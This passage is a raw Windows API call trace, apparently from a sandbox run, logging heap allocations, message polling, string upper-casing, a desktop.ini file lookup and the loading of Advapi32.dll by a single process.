returned 3 [0261.479] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0261.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0261.479] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0261.479] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.480] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0261.480] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0261.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.480] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0261.480] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0261.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0261.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.481] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/desktop.ini", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa340047, dwReserved1=0x22fc8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5920 [0261.481] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0261.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0261.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0261.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.484] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0261.484] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.484] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.485] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.485] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.485] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.485] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.486] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.486] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.486] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.488] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.489] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.490] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.490] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.490] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.491] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.491] RtlAllocateHeap (HeapHandle=0x25c0000, 